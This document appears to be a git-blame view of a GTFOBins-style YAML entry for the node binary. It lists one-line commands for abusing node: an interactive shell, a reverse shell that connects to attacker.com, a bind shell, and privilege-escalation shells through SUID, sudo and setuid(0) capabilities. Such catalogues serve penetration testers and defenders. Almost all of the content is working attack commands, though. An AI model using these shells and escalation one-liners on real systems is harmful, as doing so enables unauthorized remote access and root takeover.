2018-05-23 20:47:50 +02:00
|
|
|
---
|
|
|
|
functions:
|
2018-05-25 15:30:02 +02:00
|
|
|
execute-interactive:
|
2018-07-16 15:01:50 +02:00
|
|
|
- code: |
|
|
|
|
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
2018-05-25 15:30:02 +02:00
|
|
|
reverse-shell-interactive:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
|
|
|
code: |
|
|
|
|
export RHOST=attacker.com
|
|
|
|
export RPORT=12345
|
|
|
|
node -e 'sh = require("child_process").spawn("/bin/sh");
|
|
|
|
net.connect(process.env.RPORT, process.env.RHOST, function () {
|
|
|
|
this.pipe(sh.stdin);
|
|
|
|
sh.stdout.pipe(this);
|
|
|
|
sh.stderr.pipe(this);
|
|
|
|
});'
|
2018-05-25 15:30:02 +02:00
|
|
|
bind-shell-interactive:
|
2018-07-16 15:01:50 +02:00
|
|
|
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
|
|
|
code: |
|
|
|
|
export LPORT=12345
|
|
|
|
node -e 'sh = require("child_process").spawn("/bin/sh");
|
|
|
|
require("net").createServer(function (client) {
|
|
|
|
client.pipe(sh.stdin);
|
|
|
|
sh.stdout.pipe(client);
|
|
|
|
sh.stderr.pipe(client);
|
|
|
|
}).listen(process.env.LPORT);'
|
2018-07-04 20:26:52 +02:00
|
|
|
suid-enabled:
|
2018-07-16 15:01:50 +02:00
|
|
|
- code: |
|
|
|
|
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
2018-07-04 20:26:52 +02:00
|
|
|
sudo-enabled:
|
2018-07-16 15:01:50 +02:00
|
|
|
- code: |
|
|
|
|
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
2018-09-12 23:02:05 +02:00
|
|
|
capabilities-enabled:
|
|
|
|
- code: |
|
|
|
|
./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
2018-05-24 00:40:03 +02:00
|
|
|
---
|